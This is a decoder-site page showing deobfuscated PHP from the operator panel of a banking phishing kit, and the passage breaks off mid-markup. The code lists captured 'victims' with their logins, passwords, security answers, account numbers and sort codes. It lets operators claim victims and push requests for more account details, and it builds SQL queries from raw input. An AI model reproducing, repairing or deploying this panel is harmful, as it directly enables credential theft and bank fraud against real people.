Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto OuUJh; vRBuL: if ($_SESSION["\x61\x64\x6d\x69\156\x5f\x6c\x6f\147\147\x65\144..
Decoded Output download
<?php
goto OuUJh; vRBuL: if ($_SESSION["admin_logged"] == "true") { if ($_GET["type"] == "commmand") { if ($_POST["userid"] and numeric($_POST["userid"]) == true and $_POST["status"] and numeric($_POST["status"]) == true) { $userid = $_POST["userid"]; $status = $_POST["status"]; $secque = mysqli_real_escape_string($conn, $_POST["secque"]); $imglink1 = mysqli_real_escape_string($conn, $_POST["imglink1"]); $imglink2 = mysqli_real_escape_string($conn, $_POST["imglink2"]); $input_char1 = mysqli_real_escape_string($conn, $_POST["input_char1"]); $comment = "Admin has sent command"; if ($imglink1 != null and $imglink1 != '' and $imglink2 == null and $imglink2 == '' and $input_char1 == null and $input_char1 == '') { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, imglink1='{$imglink1}' WHERE id={$userid}"); } elseif ($imglink2 != null and $imglink2 != '' and $imglink1 == null and $imglink1 == '' and $input_char1 == null and $input_char1 == '') { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, imglink2='{$imglink2}' WHERE id={$userid}"); } elseif ($secque != null and $secque != '' and $imglink2 == null and $imglink2 == '') { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status}, secque='{$secque}' WHERE id={$userid}"); } else { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status} WHERE id={$userid}"); } if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } else { echo json_encode(array("status" => "command error")); } } if (isset($_GET["get_submitted"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=10 and buzzed=0"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if (isset($_GET["fetch_pc_data"])) { $query = mysqli_query($conn, "SELECT * from customers ORDER BY id DESC"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-primary">Submitted Security answer</span>"; } elseif ($value["status"] == 3) { $info = "<span class="badge badge-primary">Submitted Account Info</span>"; } elseif ($value["status"] == 4) { $info = "<span class="badge badge-primary">Submitted Card Info</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Security answer</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting Account Info</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-primary">Invalid</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "\xa \x9<tr style='color:white'>
\x9 \x9\x9<td>{$value["id"]}</td>
\x9 \x9\x9\x9<td>{$value["usrlogin"]}</td>
\x9 <td>{$userStatus}</td>\xa\x9\x9 \x9<td>{$value["ip"]}</td>
\x9\x9\x9<td>{$info}</td>\xa \x9\x9 <td>
\x9 \x9<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>
\x9\x9 <button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9\x9\x9\x9\x9</td>
\x9\x9 \x9\x9<td>Finished by - {$value["log_owner"]}</td>\xa \x9 </tr>
\x9 "; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } if ($Multiple_Admins == "off") { echo "
\x9\x9\x9<tr style='color:white'>\xa\x9 \x9 \x9 <td>{$value["id"]}</td>\xa \x9\x9 <td>{$value["usrlogin"]}</td>
\x9\x9\x9 \x9<td>{$userStatus}</td>\xa\x9\x9\x9\x9\x9\x9<td>{$value["ip"]}</td>\xa \x9\x9 <td>{$value["comment"]}</td>\xa \x9 <td>{$info}</td>
\x9\x9\x9 \x9 <td>
\x9 \x9\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
\x9\x9 <button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa \x9 \x9 </td>
\x9\x9\x9\x9\x9</tr>\xa \x9\x9\x9"; } else { if ($value["log_owner"] == '') { echo "\xa \x9 \x9<tr style='color:white'>
\x9 \x9\x9\x9<td>{$value["id"]}</td>
\x9 \x9 \x9 <td>{$value["usrlogin"]}</td>\xa\x9\x9 \x9 \x9<td>{$userStatus}</td>
\x9\x9 \x9\x9 <td>{$value["ip"]}</td>\xa \x9\x9 \x9\x9<td>{$value["comment"]}</td>\xa \x9\x9 <td>{$info}</td>\xa \x9 \x9\x9 \x9<td>
\x9 \x9 \x9\x9<button type='button' onclick='claimBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'> Claim Log \360\x9f\224\221</button>\xa\x9 \x9\x9 </td>
\x9\x9 \x9\x9</tr>\xa \x9 \x9\x9 "; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo "\xa\x9\x9\x9 \x9 <tr style='color:white'>\xa \x9\x9\x9 \x9<td>{$value["id"]}</td>
\x9\x9\x9\x9<td>{$value["usrlogin"]}</td>\xa\x9 \x9 \x9\x9 <td>{$userStatus}</td>
\x9 <td>{$value["ip"]}</td>\xa \x9\x9 \x9<td>{$value["comment"]}</td>\xa \x9\x9 <td>{$info}</td>
\x9 \x9<td>
\x9 \x9 \x9 \x9\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>\xa\x9 \x9 \x9\x9\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa \x9\x9\x9</td>\xa\x9\x9 \x9\x9</tr>
\x9\x9\x9\x9 "; } else { echo "
\x9\x9\x9\x9\x9 <tr style='color:white'>\xa \x9\x9\x9\x9 \x9<td>{$value["id"]}</td>\xa\x9 \x9\x9\x9 <td>{$value["usrlogin"]}</td>
\x9 \x9 <td>{$userStatus}</td>
\x9 \x9\x9\x9 <td>{$value["ip"]}</td>\xa \x9\x9\x9 <td>{$value["comment"]}</td>\xa\x9 <td>{$info}</td>
\x9 \x9 \x9\x9\x9<td>\xa \x9\x9 \x9 \x9\x9<span>Claimed by - <i>{$value["log_owner"]}</i></span>
\x9\x9 \x9 </td>
\x9\x9\x9 </tr>
\x9 \x9 \x9"; } } } } } } if (isset($_GET["fetch_data"])) { $query = mysqli_query($conn, "SELECT * from customers ORDER BY id DESC"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-primary">Submitted Security answer</span>"; } elseif ($value["status"] == 3) { $info = "<span class="badge badge-primary">Submitted Account Info</span>"; } elseif ($value["status"] == 4) { $info = "<span class="badge badge-primary">Submitted Card Info</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Security answer</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting Account Info</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-primary">Invalid</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "\xa\x9\x9\x9 <tr style='color:white'>\xa\x9\x9 \x9\x9<td>{$value["id"]}</td>\xa <td>{$value["usrlogin"]}</td>\xa\x9\x9\x9 <td>{$userStatus}</td>
\x9\x9<td>{$value["ip"]}</td>
\x9\x9\x9 \x9<td>{$info}</td>
\x9\x9\x9 <td>\xa\x9\x9\x9 \x9 <button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>\xa \x9 \x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
\x9 \x9\x9</td>\xa\x9\x9\x9 \x9<td>Finished by - {$value["log_owner"]}</td>
\x9\x9\x9\x9</tr>
"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } if ($Multiple_Admins == "off") { echo "
\x9\x9 <tr style='color:white'>\xa\x9\x9 \x9<td>{$value["id"]}</td>
\x9\x9\x9<td>{$value["usrlogin"]}</td>\xa \x9 \x9 <td>{$userStatus}</td>
\x9 \x9 \x9<td>{$info}<br>{$value["comment"]}</td>
\x9\x9\x9 <td>
\x9\x9 \x9 <button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
\x9 \x9\x9\x9 <button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
\x9 </td>\xa \x9 </tr>
\x9 "; } else { if ($value["log_owner"] == '') { echo "
\x9 \x9 \x9<tr style='color:white'>\xa \x9 \x9 <td>{$value["id"]}</td>\xa\x9 \x9\x9\x9\x9 <td>{$value["usrlogin"]}</td>\xa \x9 \x9 <td>{$userStatus}</td>\xa\x9 \x9\x9 \x9<td>{$info}<br>{$value["comment"]}</td>\xa\x9\x9\x9 \x9\x9<td>\xa \x9\x9\x9 <button type='button' onclick='claimBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'> Claim Log \360\237\x94\x91</button>\xa\x9 \x9 \x9\x9</td>
\x9 </tr>
\x9 \x9\x9"; } else { if ($value["log_owner"] == $_SESSION["log_owner"]) { echo "
\x9\x9\x9 <tr style='color:white'>
\x9\x9\x9<td>{$value["id"]}</td>
\x9 \x9 \x9 \x9<td>{$value["usrlogin"]}</td>
\x9\x9 \x9 <td>{$userStatus}</td>\xa \x9 \x9\x9<td>{$info}<br>{$value["comment"]}</td>\xa\x9\x9 \x9\x9\x9 <td>{$info}</td>
\x9 \x9 <td>\xa \x9 \x9 \x9\x9<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
\x9\x9 \x9\x9\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9\x9 \x9\x9 </td>\xa \x9\x9 \x9 </tr>
\x9 \x9\x9"; } else { echo "\xa\x9\x9 \x9 <tr style='color:white'>\xa\x9 \x9 \x9 <td>{$value["id"]}</td>
\x9 \x9 \x9 <td>{$value["usrlogin"]}</td>\xa \x9 \x9<td>{$userStatus}</td>
\x9\x9\x9 \x9<td>{$info}<br>{$value["comment"]}</td>\xa \x9 \x9\x9\x9\x9<td>
\x9 \x9\x9\x9\x9\x9<span>Claimed by - <i>{$value["log_owner"]}</i></span>
\x9\x9\x9 </td>
\x9\x9\x9 \x9</tr>
\x9 \x9 \x9\x9"; } } } } } } if (isset($_GET["claim_data"])) { if ($_POST["userid"] and numeric($_POST["userid"]) == true) { $userid = $_POST["userid"]; $log_owner = $_SESSION["log_owner"]; $query = mysqli_query($conn, "UPDATE customers SET log_owner='{$log_owner}', buzzed=1 WHERE id={$userid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notokk")); } } if (isset($_GET["fetch_pc_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $secans = $value["secans"]; $secque = $value["secque"]; $acct = $value["acct"]; $sort = $value["sort"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "\xa=====\342\x89\253 Login \342\211\252=====\xaUser ID : {$usrlogin}
Pass : {$usrpass}
=====\342\211\253 Security \342\x89\252=====
Security Answer: {$secque}
Security Answer: {$secans}
=====\xe2\x89\253 Account \xe2\211\252=====\xaAccount No. : {$acct}\xaSort code : {$sort}
===============================
IP : {$ip}
UA : {$useragent}
==============================="; echo "
\x9\x9<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' aria-hidden='true' style='opacity:1 !important;display:none;height:100%;overflow:scroll;'>
\x9\x9 <form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa\x9\x9\x9\x9\x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9 \x9<div class='modal-dialog' role='document' style='width:500px'>
\x9\x9\x9\x9<div class='modal-content' style='background-color: black;'>
\x9\x9\x9\x9\x9 \x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa \x9 \x9 \x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Admin Control</h5>
\x9\x9 \x9 <button type='button' class='close' onclick='close_btn()' aria-label='Close'>\xa\x9\x9 \x9\x9\x9\x9<span aria-hidden='true' style='color:white'>×</span>
\x9 \x9 \x9\x9</button>\xa\x9 \x9\x9 </div>
\x9 \x9<div class='modal-body'>
\x9 \x9\x9\x9<div class='form-group' style='margin-bottom:1rem'>\xa\x9\x9\x9 \x9 \x9 <br>
\x9 \x9\x9\x9<textarea id='textareaoptions' class='form-control' disabled='disabled' rows='16' style='height:300px;'>{$data_log}</textarea>
\x9\x9\x9 </div>\xa \x9\x9\x9\x9\x9\x9\x9
\x9\x9 \x9\x9<table style='width: 100%;background-color: black;color: white;padding: 10%;'>\xa\x9\x9 \x9\x9<tbody style='line-height:100%;'>
\x9 \x9\x9\x9\x9 \x9
\x9 \x9 \x9 \x9\x9\x9<tr>
\x9\x9 \x9 \x9 <td>
\x9 \x9 \x9 \x9 \x9<div class='form-check'>
\x9 \x9\x9 \x9\x9 \x9\x9 \x9<label for='askcharsradio0{$value["id"]}' class='form-check-label'>\xa\x9 \x9\x9 \x9 \x9 \x9 <input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9\x9\x9 \x9 \x9 \x9 \x9 <span>Request Question</span>
\x9\x9\x9 \x9\x9\x9\x9 \x9 \x9 </label>\xa\x9\x9\x9\x9\x9\x9\x9\x9\x9 \x9\x9</div>
\x9 \x9\x9 \x9\x9<!-- Input characters -->\xa\x9\x9 \x9\x9 \x9\x9\x9 \x9<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>
\x9\x9\x9 \x9 \x9\x9 <div class='row' style='margin-left:5%;margin-top:5px' >
\x9\x9 \x9\x9 \x9\x9\x9 \x9\x9<div class='col'>
\x9\x9 \x9 \x9\x9\x9 \x9 <input type='text' class='form-control' placeholder='Enter question here' name='secque' id='secque' style='margin-right:10px;border-color:#d6d6e5'>\xa\x9 \x9 \x9 \x9 \x9 </div>\xa\x9\x9\x9\x9\x9\x9 \x9 \x9 </div>
\x9\x9 \x9 \x9 \x9\x9 \x9</div>
\x9\x9 \x9\x9\x9\x9\x9 </td>
\x9 \x9 \x9\x9 <td>\xa \x9\x9 \x9\x9\x9 \x9<div class='form-check'>\xa\x9 \x9\x9 \x9 \x9\x9 \x9<label for='askcharsradio1{$value["id"]}' class='form-check-label'>
\x9 \x9 \x9 \x9 \x9<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9 \x9 \x9 <span>Request Acct Info</span>
\x9\x9 \x9 \x9 </label>\xa \x9 \x9 \x9 </div>\xa \x9\x9 \x9</td>
\x9 \x9 \x9 \x9 \x9</tr>
\x9\x9\x9 \x9 \x9 \xa\x9 \x9\x9\x9 \x9 \x9<tr>\xa \x9 \x9 \x9 \x9<td>
\x9\x9 \x9 \x9 \x9\x9 <div class='form-check'>\xa \x9\x9\x9\x9\x9\x9\x9 \x9 <label for='finishradio0{$value["id"]}' class='form-check-label'>\xa \x9 \x9\x9 \x9 \x9 <input type='radio' name='status' value='20' id='finishradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9 \x9\x9\x9 \x9 <span>Finish</span>
\x9 \x9 \x9 \x9</label>\xa\x9\x9 \x9\x9 \x9 </div>
\x9\x9\x9\x9\x9 \x9</td>\xa\x9 \x9 \x9 \x9\x9\x9\x9 <td>
\x9\x9 \x9 \x9<div class='form-check'>\xa \x9 \x9\x9\x9\x9 \x9\x9\x9<label for='askloginradio0{$value["id"]}' class='form-check-label'>
\x9 \x9\x9 <input type='radio' name='status' value='50' id='askloginradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9 \x9\x9 \x9\x9\x9\x9\x9\x9 <span>Request login again </span>
\x9\x9 \x9 \x9\x9\x9\x9\x9 \x9</label>
\x9 \x9 \x9 \x9</div>\xa \x9 \x9\x9\x9\x9\x9 \x9</td>\xa\x9\x9\x9\x9 \x9 </tr>\xa\x9 \x9 \x9 \x9\x9\x9
\x9\x9\x9 \x9<!--<tr>
\x9\x9 \x9 \x9 <td>\xa \x9 \x9 <div class='form-check'>
\x9\x9 \x9 \x9 \x9\x9 \x9\x9<label for='sendawayradio0{$value["id"]}' class='form-check-label'>\xa\x9\x9 \x9\x9 \x9 \x9\x9 <input type='radio' name='status' value='100' id='sendawayradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa \x9\x9\x9\x9 \x9\x9\x9 \x9<span>Invalid, Send away</span>\xa \x9\x9\x9 \x9\x9 \x9\x9\x9 </label>\xa\x9 \x9 \x9 \x9 \x9\x9</div>\xa \x9 \x9\x9 \x9\x9</td>\xa \x9\x9 \x9 \x9</tr>-->
\x9\x9\x9\x9 \x9\x9\x9\x9\x9\xa \x9\x9 \x9 \x9\x9</tbody>\xa \x9\x9\x9\x9 </table>
\x9\x9 </div>\xa\x9 \x9 \x9\x9\x9<!-- End commands edit -->\xa
\x9 \x9\x9\x9<div class='modal-footer' style='margin-top:-40px'>\xa\x9 \x9 \x9\x9\x9<button type='button' class='btn btn-secondary' onclick='close_btn()' data-dismiss='modal'>Close</button>\xa\x9\x9\x9 \x9 <button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>\xa \x9 \x9\x9</div>
\x9\x9\x9 </div>\xa \x9 \x9</div>\xa\x9 \x9</form>
\x9 </div>
\x9"; } } if (isset($_GET["fetch_pc_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $secans = $value["secans"]; $secque = $value["secque"]; $acct = $value["acct"]; $sort = $value["sort"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "
=====\342\x89\xab Login \342\211\xaa=====\xaUser ID : {$usrlogin}
Pass : {$usrpass}
=====\xe2\x89\xab Security \342\x89\xaa=====
Security Answer: {$secque}\xaSecurity Answer: {$secans}\xa=====\xe2\x89\xab Account \342\211\252=====
Account No. : {$acct}
Sort code : {$sort}
===============================\xaIP : {$ip}
UA : {$useragent}\xa==============================="; echo "\xa \xa <div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-hidden='true'>\xa\x9\x9
\x9 \x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
\x9 \x9<input type='hidden' name='userid' value='{$value["id"]}'>\xa <div class='modal-dialog' role='document' style='width:500px'>
\x9\x9 \x9\x9<div class='modal-content'>
\x9\x9 <div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9\x9 \x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Victim Info</h5>
\x9\x9\x9 \x9<button type='button' class='close' data-dismiss='modal' aria-label='Close'>
\x9\x9 \x9\x9 <span aria-hidden='true' style='color:white'>×</span>\xa\x9\x9 \x9 \x9 \x9</button>
\x9\x9 \x9\x9 </div>\xa \x9 \x9 \x9<div class='modal-body'>
\x9\x9\x9 \x9 <div class='form-group'>
\x9\x9\x9 <br>\xa \x9\x9\x9\x9\x9\x9 <textarea id='textareafinish' class='form-control' disabled='disabled' rows='12'>{$data_log}</textarea>
\x9 \x9 \x9 </div>\xa\x9\x9 \x9</div>\xa\x9 \x9 \x9 <div class='modal-footer' style='margin-top:-40px'>\xa \x9 \x9<button type='button' class='btn btn-lg btn-dark col-12' onclick='close_btn()'>CLOSE</button>\xa\x9\x9\x9 \x9 </div>
\x9\x9 \x9\x9 </div>
\x9 \x9 </div>
\x9\x9 </form>\xa\x9 </div>
\x9\x9"; } } if (isset($_GET["fetch_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $usrpass = $value["usrpass"]; $secans = $value["secans"]; $secque = $value["secque"]; $acct = $value["acct"]; $sort = $value["sort"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "\xa\x9
\x9<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa\x9
\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
\x9\x9 \x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9\x9\x9\x9<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>
\x9 \x9\x9 \x9<div class='modal-content' style='background-color: black;'>
\x9 \x9\x9 \x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9 \x9 \x9<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>\xa \x9\x9\x9\x9 \x9<button type='button' class='close' onclick='close_btn()' aria-label='Close'>
\x9 \x9\x9 \x9 <span aria-hidden='true' style='color:white'>×</span>\xa \x9\x9\x9 </button>\xa\x9 \x9 \x9 </div>\xa\x9 \x9\x9 \x9<div class='modal-body'>\xa \x9\x9\x9\x9 \x9 <div class='form-group' style='margin-bottom:1rem'>\xa \x9 \x9 \x9\x9<br>\xa \x9 \x9\xa \x9 \x9\x9 <div class='data-group'>
\x9 \x9\x9 <label class='data-label'>Login ID</label>
\x9 \x9 \x9 \x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>
\x9 \x9\x9\x9\x9\x9\x9</div>\xa\x9 \x9 \x9<div class='data-group'>\xa \x9 \x9 <label class='data-label'>Pass</label>
\x9\x9 \x9 \x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$usrpass}'>\xa\x9 \x9\x9\x9\x9\x9 \x9</div>
\x9 \x9\x9\x9\x9<div class='data-group'>
\x9 \x9 \x9<label class='data-label'>Question</label>\xa\x9 \x9\x9\x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$secque}'>
\x9 \x9 \x9\x9\x9\x9 </div>
\x9 \x9 <div class='data-group'>
\x9 \x9 \x9 <label class='data-label'>Answer</label>\xa\x9 \x9\x9\x9 \x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$secans}'>\xa\x9 \x9\x9\x9\x9 \x9</div>
\x9\x9 \x9 <div class='data-group'>\xa \x9 \x9 \x9\x9<label class='data-label'>Account</label>
\x9\x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$acct}'>
\x9\x9\x9\x9 </div>
\x9\x9\x9\x9 \x9 \x9\x9<div class='data-group'>\xa\x9\x9\x9 \x9\x9\x9\x9\x9 <label class='data-label'>Sort</label>
\x9\x9 \x9 \x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$sort}'>
\x9 \x9\x9 \x9 </div>\xa \x9\x9\x9 \x9 \x9\x9<div class='data-group'>
\x9\x9 \x9\x9\x9\x9 <label class='data-label'>IP/Device</label>
\x9 \x9\x9\x9\x9 <input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>\xa \x9 \x9 \x9 \x9\x9</div>\xa \x9\x9\x9\x9\x9 \x9<br>\xa\x9\x9\x9\x9 \x9 </div>\xa\xa \x9\x9\x9\x9 \x9<!-- END -->\xa
\x9\x9\x9 \x9<table style='width: 100%;background-color: black;color: white;padding: 10%;'>
\x9\x9 \x9 \x9<tbody style='line-height:100%;'>\xa\x9 \x9 \x9 \x9 \xa \x9\x9 \x9 \x9<tr>\xa \x9 \x9\x9\x9\x9 \x9 <td>\xa\x9 \x9\x9 \x9 \x9\x9<div class='form-check'>
\x9\x9\x9 \x9 \x9 <label for='askcharsradio0{$value["id"]}' class='form-check-label'>
\x9 \x9 \x9 \x9\x9 \x9 <input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9\x9 \x9\x9\x9\x9 \x9 <span>Request Question</span>
\x9\x9\x9\x9\x9\x9\x9 \x9\x9 </label>\xa \x9\x9 \x9 </div>
\x9 \x9 \x9 \x9<!-- Input characters -->
\x9 \x9 \x9 \x9\x9\x9<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>
\x9\x9\x9\x9\x9\x9 \x9 <div class='row' style='margin-left:5%;margin-top:5px' >\xa\x9 \x9 \x9 \x9\x9 \x9 <div class='col'>
\x9 \x9\x9\x9\x9\x9 \x9\x9\x9<input type='text' class='form-control' placeholder='Enter question here' name='secque' id='secque' style='margin-right:10px;border-color:#d6d6e5'>
\x9 \x9\x9\x9\x9\x9 </div>\xa \x9 \x9</div>
\x9 \x9\x9\x9 \x9 </div>
\x9 \x9 \x9\x9</td>
\x9 \x9\x9\x9 \x9 <td>
\x9 \x9\x9\x9\x9 \x9 \x9<div class='form-check'>\xa\x9\x9\x9 \x9\x9\x9<label for='askcharsradio1{$value["id"]}' class='form-check-label'>\xa \x9\x9 \x9\x9\x9 \x9\x9\x9\x9\x9 <input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9 \x9 \x9 \x9 \x9\x9 \x9\x9 <span>Request Acct Info</span>\xa\x9\x9 \x9 \x9\x9 \x9 \x9 </label>\xa \x9\x9\x9 \x9\x9\x9\x9 </div>\xa \x9\x9 \x9\x9\x9 \x9\x9\x9</td>
\x9\x9\x9\x9 \x9 </tr>\xa\x9\x9 \x9\x9\x9 \x9 \x9\x9\xa\x9\x9\x9 \x9 \x9 \x9<tr>\xa\x9\x9 \x9\x9 \x9 \x9 \x9<td>
